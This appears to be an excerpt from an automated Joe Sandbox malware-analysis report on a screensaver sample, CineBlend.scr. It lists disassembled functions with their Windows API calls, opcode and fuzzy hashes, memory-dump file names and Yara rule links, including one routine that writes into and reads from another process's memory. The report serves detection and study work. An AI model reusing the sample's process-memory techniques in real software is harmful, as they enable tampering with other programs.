API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: f5575a2f5263571b7df3b9b984b371b456fa8690c61646139b635fb1bdb87713
Instruction ID: b2591b498393bc37dae9a99e57a8b84553d4d974963d1fb7315acda18460bf11
Opcode Fuzzy Hash: f5575a2f5263571b7df3b9b984b371b456fa8690c61646139b635fb1bdb87713
Instruction Fuzzy Hash: 5E017176B016157F332167665C88D7B6AADDEC7FA131801A9F904E7244DEA88D0181B0

Function 00B96078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00B9608D
_memcmp.LIBVCRUNTIME ref: 00B960AB
_memcmp.LIBVCRUNTIME ref: 00B960BE
_memcmp.LIBVCRUNTIME ref: 00B960D6
_memcmp.LIBVCRUNTIME ref: 00B960EE

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 32fdaa5c97ae8c132e6f9d99dabc193ff5955a306925c2165971ab0d7ff0a4c2
Instruction ID: 17c6f9e631fa80b25f3e1c080e294ba751f257409ad1aae3d1161aa94e67bb66
Opcode Fuzzy Hash: 32fdaa5c97ae8c132e6f9d99dabc193ff5955a306925c2165971ab0d7ff0a4c2
Instruction Fuzzy Hash: F801B1E26143057B9A1166289CC2FABB3DDDE54399F0444F2FD0A9A342F761ED14C6A1

Function 00B6316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(74DE2E40,?,?,00B5F64E,00B63BD6,?,?,00B50165,?,?,00BA11D9,0000FFFF), ref: 00B63170
_free.LIBCMT ref: 00B631A5
_free.LIBCMT ref: 00B631CC
SetLastError.KERNEL32(00000000), ref: 00B631D9
SetLastError.KERNEL32(00000000), ref: 00B631E2

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 88afe6eeadaf139433aeb326033a3752ad87494a08ca5b6946871c03ae7ebda1
Instruction ID: 1365d3ccd9de1ee4f97aa61aeb7bc333e908f7733a37afeb11d9273ac816ffe5
Opcode Fuzzy Hash: 88afe6eeadaf139433aeb326033a3752ad87494a08ca5b6946871c03ae7ebda1
Instruction Fuzzy Hash: 7A012876641A002BD61227349C85E2B26EDEFD7BB172104B4F825F31C1EF3DCB018124

Function 00B908FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B90831,80070057,?,?,?,00B90C4E), ref: 00B9091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B90831,80070057,?,?), ref: 00B90936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B90831,80070057,?,?), ref: 00B90944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B90831,80070057,?), ref: 00B90954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B90831,80070057,?,?), ref: 00B90960

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 80ce1af364e487a4621e88290b355485e4af2f6bd586234c29bf9fa7ad7c66bf
Instruction ID: 7ebe305a68517780aca1e7e856eb75ff9d0f5065eb924bfeb3c810bd8e512c9c
Opcode Fuzzy Hash: 80ce1af364e487a4621e88290b355485e4af2f6bd586234c29bf9fa7ad7c66bf
Instruction Fuzzy Hash: 53018B7A610204AFEF106F59DC48F9A7AEDEB88796F144174FD05E3212EB71DD409BA0

Function 00B9F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00B9F2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 00B9F2BC
Sleep.KERNEL32(00000000), ref: 00B9F2C4
QueryPerformanceCounter.KERNEL32(?), ref: 00B9F2CE
Sleep.KERNEL32 ref: 00B9F30A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: d3555b7373c00f1c2a1500f76977b5e2c4392895b43ed89fafb7f2320034cd5c
Instruction ID: f9a369a8b225c4808c7eabc2ae8df91bc4b20e31636f10c13eb66062121ee0b6
Opcode Fuzzy Hash: d3555b7373c00f1c2a1500f76977b5e2c4392895b43ed89fafb7f2320034cd5c
Instruction Fuzzy Hash: 35016D75D0551AEBCF00AFA4E849AEDBBB8FB0D720F0504B6E501F2290DF349554C7A5

Function 00B91A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B91A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,00B914E7,?,?,?), ref: 00B91A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B914E7,?,?,?), ref: 00B91A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B914E7,?,?,?), ref: 00B91A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B91A99

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: e6b0bf475ce39786bf2d1c6c17165096424f902d10132b0e4a5ed2687040ee99
Instruction ID: f45b6495cb8f5a889a47a34634fce5bd9eef84edae0bb082ff1e4b50bdeb8f47
Opcode Fuzzy Hash: e6b0bf475ce39786bf2d1c6c17165096424f902d10132b0e4a5ed2687040ee99
Instruction Fuzzy Hash: 830181B9601606BFDF114F69DC48E6A3BAEEF88364B220474F945D3360DE31DC40DA60

Function 00B91900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B91916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B91922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B91931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B91938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B9194E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 1c2fe8166a10234152e7973420cbd4c5394531df660266065281ccf6b4e56576
Instruction ID: cea5984195e118831da008217f7cb818c8e68f780505e288615b667e9135196b
Opcode Fuzzy Hash: 1c2fe8166a10234152e7973420cbd4c5394531df660266065281ccf6b4e56576
Instruction Fuzzy Hash: 5CF06D79200302ABDB210FA9DC5DF563BADEF897A0F510824FE45E72A0CE70DC029A60

Function 00B91960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B91976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B91982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B91991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B91998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B919AE

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 471c445f1756029b7448a68bcb2c470dfacd8ef6eb089f227603ef726cd6c67a
Instruction ID: 5c403e9d70452454f0445b21d9e3143f0b5569ac2ba3d66470f463767c79c8b1
Opcode Fuzzy Hash: 471c445f1756029b7448a68bcb2c470dfacd8ef6eb089f227603ef726cd6c67a
Instruction Fuzzy Hash: 7FF06279140301ABDB214F69EC59F563BADEF8D7A0F114424FE45D7250CE70D8028A60

Function 00BA0CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00BA0B24,?,00BA3D41,?,00000001,00B73AF4,?), ref: 00BA0CCB
CloseHandle.KERNEL32(?,?,?,?,00BA0B24,?,00BA3D41,?,00000001,00B73AF4,?), ref: 00BA0CD8
CloseHandle.KERNEL32(?,?,?,?,00BA0B24,?,00BA3D41,?,00000001,00B73AF4,?), ref: 00BA0CE5
CloseHandle.KERNEL32(?,?,?,?,00BA0B24,?,00BA3D41,?,00000001,00B73AF4,?), ref: 00BA0CF2
CloseHandle.KERNEL32(?,?,?,?,00BA0B24,?,00BA3D41,?,00000001,00B73AF4,?), ref: 00BA0CFF
CloseHandle.KERNEL32(?,?,?,?,00BA0B24,?,00BA3D41,?,00000001,00B73AF4,?), ref: 00BA0D0C

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 15f11da3f5468da942ff7ae5067010ac94a91e0110772885bf9bde8c5d76a9e9
Instruction ID: cd48837ddb4ba965668f0230dd1246574636e74d4e632983a06321d0b0a769f4
Opcode Fuzzy Hash: 15f11da3f5468da942ff7ae5067010ac94a91e0110772885bf9bde8c5d76a9e9
Instruction Fuzzy Hash: F301DC72804B159FCB30AFA6D880812FAF9FE603257108A3ED09252921C7B0A848CE80

Function 00B965AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00B965BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 00B965D6
MessageBeep.USER32(00000000), ref: 00B965EE
KillTimer.USER32(?,0000040A), ref: 00B9660A
EndDialog.USER32(?,00000001), ref: 00B96624

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 0a789493fb6c6c63536f0e357a320204dd7975fea3baf75256a2371b0fa7c0fc
Instruction ID: b58f12540fa3407c68e558f22b9c82ab3b5b2373ef54b69db6235ac9b79824f0
Opcode Fuzzy Hash: 0a789493fb6c6c63536f0e357a320204dd7975fea3baf75256a2371b0fa7c0fc
Instruction Fuzzy Hash: 08011D34500704ABEF215F20DE4EF967BB8FB14705F0106BAB586A20E1DFF4AA54CA95

Function 00B6DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B6DAD2

Part of subcall function 00B62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6DB51,?,00000000,?,00000000,?,00B6DB78,?,00000007,?,?,00B6DF75,?), ref: 00B62D4E
Part of subcall function 00B62D38: GetLastError.KERNEL32(?,?,00B6DB51,?,00000000,?,00000000,?,00B6DB78,?,00000007,?,?,00B6DF75,?,?), ref: 00B62D60

_free.LIBCMT ref: 00B6DAE4
_free.LIBCMT ref: 00B6DAF6
_free.LIBCMT ref: 00B6DB08
_free.LIBCMT ref: 00B6DB1A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e44da39038936c77c564590e48552ec78b7fc339704204c47529ede0ca7b734b
Instruction ID: 5665225e9ccd087208b1f659f3e9e88106d92e60bd9c657f02d4aa449fac50d6
Opcode Fuzzy Hash: e44da39038936c77c564590e48552ec78b7fc339704204c47529ede0ca7b734b
Instruction Fuzzy Hash: 77F01232A49604AB9624EB99E981C2A77EEFE057507990CD5F009D7501CB38FC80C654

Function 00B62610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B6262E

Part of subcall function 00B62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6DB51,?,00000000,?,00000000,?,00B6DB78,?,00000007,?,?,00B6DF75,?), ref: 00B62D4E
Part of subcall function 00B62D38: GetLastError.KERNEL32(?,?,00B6DB51,?,00000000,?,00000000,?,00B6DB78,?,00000007,?,?,00B6DF75,?,?), ref: 00B62D60

_free.LIBCMT ref: 00B62640
_free.LIBCMT ref: 00B62653
_free.LIBCMT ref: 00B62664
_free.LIBCMT ref: 00B62675

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 060113cb4de49315323c7a145f78ab5f257e99c6b65d13fe8b70d5d0fad1ea0d
Instruction ID: 6c4a29fafc7202c3114b12c47ca53567496490310b72227cfb6ce8507366108c
Opcode Fuzzy Hash: 060113cb4de49315323c7a145f78ab5f257e99c6b65d13fe8b70d5d0fad1ea0d
Instruction Fuzzy Hash: 82F0DA718019219BDA12AFD4EC05B5C7BE5FB257A134609ABF814D7275CB390901FF85

Function 00B31EB9 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00B31EC8
StrokeAndFillPath.GDI32(?,?,00B73294,00000000,?,?,?), ref: 00B31EE4
SelectObject.GDI32(?,00000000), ref: 00B31EF7
DeleteObject.GDI32 ref: 00B31F0A
StrokePath.GDI32(?), ref: 00B31F25

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 91fd42776d3fdd9f8db5e055d4d84eeaed222849c5b9d3de1a259caaf5c2dae6
Instruction ID: efb96a85a13a3a2a54480b5d3856b712b792e008639ebc7e39284f78764afef0
Opcode Fuzzy Hash: 91fd42776d3fdd9f8db5e055d4d84eeaed222849c5b9d3de1a259caaf5c2dae6
Instruction Fuzzy Hash: 1EF0EC34005204AFDB169F1CED0DB683BA9FB49332F159269E469450F0CB3189A6EF51

Function 00B612B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00B61469
__freea.LIBCMT ref: 00B61487

Part of subcall function 00B618A7: _free.LIBCMT ref: 00B618BF

Strings

am/pm, xrefs: 00B614EA
a/p, xrefs: 00B6154E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 74b8f880f023a41b99c62656613328dd5cc30b2776d9c276970131912a5c7643
Instruction ID: 6a3a84cea25e8fefcd0f97c7327b854c3ac4afbdd0909200a37b8cd2c5101247
Opcode Fuzzy Hash: 74b8f880f023a41b99c62656613328dd5cc30b2776d9c276970131912a5c7643
Instruction Fuzzy Hash: E6D104759102069ACB24DF6CC895BBAB7F5FF15300F2C49DAE9029B250D77D9D80CBA0

Function 00B93063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B92B1D,?,?,00000034,00000800,?,00000034), ref: 00B9BDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B930AD

Part of subcall function 00B9BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B92B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00B9BDBF

Part of subcall function 00B9BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00B9BD1C
Part of subcall function 00B9BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B92AE1,00000034,?,?,00001004,00000000,00000000), ref: 00B9BD2C
Part of subcall function 00B9BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B92AE1,00000034,?,?,00001004,00000000,00000000), ref: 00B9BD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B9311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B93167

Strings

@, xrefs: 00B9317F

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 37ea34362e8d854dba2cd9905bf8d5faf233c1690a7a6194ec02c4798f798723
Instruction ID: 1bfe996f6aa1c6e4e9b59787173542d2bd508c3f90d0489eb95479ea025779ce
Opcode Fuzzy Hash: 37ea34362e8d854dba2cd9905bf8d5faf233c1690a7a6194ec02c4798f798723
Instruction Fuzzy Hash: 6D411676900218AFDF10DBA4CD85EEEBBF8EF49700F1040A5EA45B7191DA706E85CB60

Function 00B61A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr,00000104), ref: 00B61AD9
_free.LIBCMT ref: 00B61BA4
_free.LIBCMT ref: 00B61BAE

Strings

C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr, xrefs: 00B61AD0, 00B61AD7, 00B61B06, 00B61B3E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr
API String ID: 2506810119-1382941048
Opcode ID: c04bf281c2f881d4916f369540bf050c7d080125d8b330dc74ede3aa3a29df5b
Instruction ID: 9edf771822efc503d4ddd3895bdd4143171aa08efdf52b3f3766de0ad7069b9f
Opcode Fuzzy Hash: c04bf281c2f881d4916f369540bf050c7d080125d8b330dc74ede3aa3a29df5b
Instruction Fuzzy Hash: 06315E71A00218AFDB21DF9DDC85EAEBBFCEF85710B1845E6E80497221E6748E41DB90

Function 00B9CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B9CBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 00B9CBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C029C0,00F15BA8), ref: 00B9CC40

Strings

0, xrefs: 00B9CB8A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

